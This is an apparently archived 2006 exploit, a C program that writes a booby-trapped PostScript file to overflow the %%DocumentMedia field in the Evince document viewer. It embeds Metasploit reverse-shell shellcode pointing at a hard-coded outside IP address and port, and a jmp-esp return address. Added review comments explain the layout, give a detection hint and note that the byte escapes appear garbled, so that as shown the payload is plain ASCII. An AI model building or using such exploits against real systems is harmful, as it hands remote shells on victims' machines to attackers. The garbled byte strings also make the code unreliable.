
# Title : Evince Document Viewer (DocumentMedia) Buffer Overflow Exploit
# Published : 2006-11-28
# Author : K-sPecial


/*
 * Creator: K-sPecial (xzziroz.net) of .aware (awarenetwork.org)
 * Name: evince-ps-field-bof.c
 * Date: 11/27/2006
 * Version: 
 * 	1.00 - creation
 *
 * Other: this idea originally came from the BID for the 'gv' buffer overflow (20978); i don't
 *  believe it was known until now that evince is also vulnerable. 
 *
 * Compile: gcc -o epfb evince-ps-field-bof.c -std=c99
*/
#include <stdio.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <arpa/inet.h>

// insert shellcode here, i'm not going to implement ip/port changing since
// metasploit's shellcode generation engine does it just fine. i had a picky time
// with the shellcodes; there must be some bad bytes. this shellcode from 
// metasploit works but be SURE to set Encoder=None

/* linux_ia32_reverse -  LHOST=67.76.107.14 LPORT=5555 Size=70 Encoder=None http://metasploit.com */
// Payload bytes that main() writes verbatim after the 100 filler bytes of the
// %%DocumentMedia field. NOTE(review): the escape sequences look as if they
// lost their backslashes in extraction ("x31" rather than a byte value), so as
// written this is a plain ASCII string, not the 70 bytes the metasploit line
// above describes. main() sizes the write with strlen(cb), so a 0x00 byte
// anywhere in the payload would truncate it.
char cb[] =
"x31xdbx53x43x53x6ax02x6ax66x58x89xe1xcdx80x93x59"
"xb0x3fxcdx80x49x79xf9x5bx5ax68x43x4cx6bx0ex66x68"
"x15xb3x43x66x53x89xe1xb0x66x50x51x53x89xe1x43xcd"
"x80x52x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x52x53"
"x89xe1xb0x0bxcdx80";

// location of "jmp *%esp"
// 4-byte value that main() writes at offset 273 of the %%DocumentMedia field;
// the author labels it the address of a "jmp *%esp". NOTE(review): same
// lost-backslash garbling as cb[] -- as written it is 12 ASCII characters, of
// which main() writes only the first 4.
char jmpesp[] = "x77xe7xffxff";

/*
 * Entry point of the proof-of-concept generator.
 *
 * Writes a PostScript file to the path given in argv[1] whose
 * "%%DocumentMedia:" DSC comment carries an oversized value: 100 filler
 * bytes, the cb[] payload, 'A' padding up to offset 273 of the field, the
 * 4-byte jmpesp[] value and a trailing 5-byte sequence. The remaining header
 * lines are ordinary DSC comments.
 *
 * Returns 0 after writing; calls exit(1) if the output file cannot be opened.
 * NOTE(review): argc is never checked, so running the program with no
 * argument passes argv[1] == NULL to fopen().
 *
 * From a detection standpoint the distinguishing feature of the output is a
 * DSC header comment whose value runs to hundreds of bytes; legitimate
 * %%DocumentMedia values are short.
 */
int main (int argc, char **argv) {
	FILE *fh;

	// NOTE(review): no argc check before argv[1] is dereferenced.
	if (!(fh = fopen(*(argv+1), "w+b"))) { 
		// The trailing "nn"/"n" here and in every fputs() string below look
		// like "\n" escapes whose backslash was lost in extraction; as written
		// they are literal letters, so no newline is emitted.
		printf("%s <file.ps>nn", *(argv));
		printf("[-] unable to open file '%s' for writing: %sn", *(argv+1), strerror(errno));
		exit(1);
	}

	// Ordinary DSC header comments that precede the oversized field.
	fputs("%!PS-Adobe-3.0n", fh);
	fputs("%%Title: hello.psn", fh);
	fputs("%%For: K-sPecial (xzziroz.net) of .aware (awarenetwork.org)n", fh);
	fputs("%%BoundingBox: 24 24 588 768n", fh);
	// Start of the oversized field; everything up to the fputc('n') below is
	// one %%DocumentMedia value.
	fputs("%%DocumentMedia: ", fh);
	// 100 filler bytes (0x90).
	for (int i = 0; i < 100; i++) 
		fputc(0x90, fh);

	// Payload bytes. strlen() stops at the first NUL, so a 0x00 byte in cb[]
	// would truncate the write; fwrite()'s return value is not checked.
	fwrite(cb, strlen(cb), 1, fh);

	// Pad with 'A' so that the next write lands at offset 273 of the field.
	// NOTE(review): if strlen(cb) + 100 already exceeds 273 -- which appears to
	// be the case for the garbled ASCII form of cb[] on this page -- the loop
	// writes nothing and the 4 bytes below land at a different offset.
	for (int i = strlen(cb) + 100; i < 273; i++) 
		fputc('A', fh);

	// The 4-byte overwrite value (see jmpesp[] above), followed by 5 more
	// bytes written verbatim; the page does not say what the latter encode.
	fwrite(jmpesp, 4, 1, fh);
	fwrite("xe9x02xffxffxff", 5, 1, fh);

	// Ends the %%DocumentMedia value (intended newline; see the note above).
	fputc('n', fh);

	// Remaining DSC comments so the file otherwise looks like a normal document.
	fputs("%%DocumentData: Clean7Bitn", fh);
	fputs("%%Orientation: Landscapen", fh);
	fputs("%%Pages: 1n", fh);
	fputs("%%PageOrder: Ascendn", fh);
	fputs("%%+ encoding ISO-8859-1Encodingn", fh);
	fputs("%%EndCommentsn", fh);

	// NOTE(review): fh is never fclose()d; buffered output is flushed by normal
	// process exit, but a write error would go unreported.
	return(0);
}
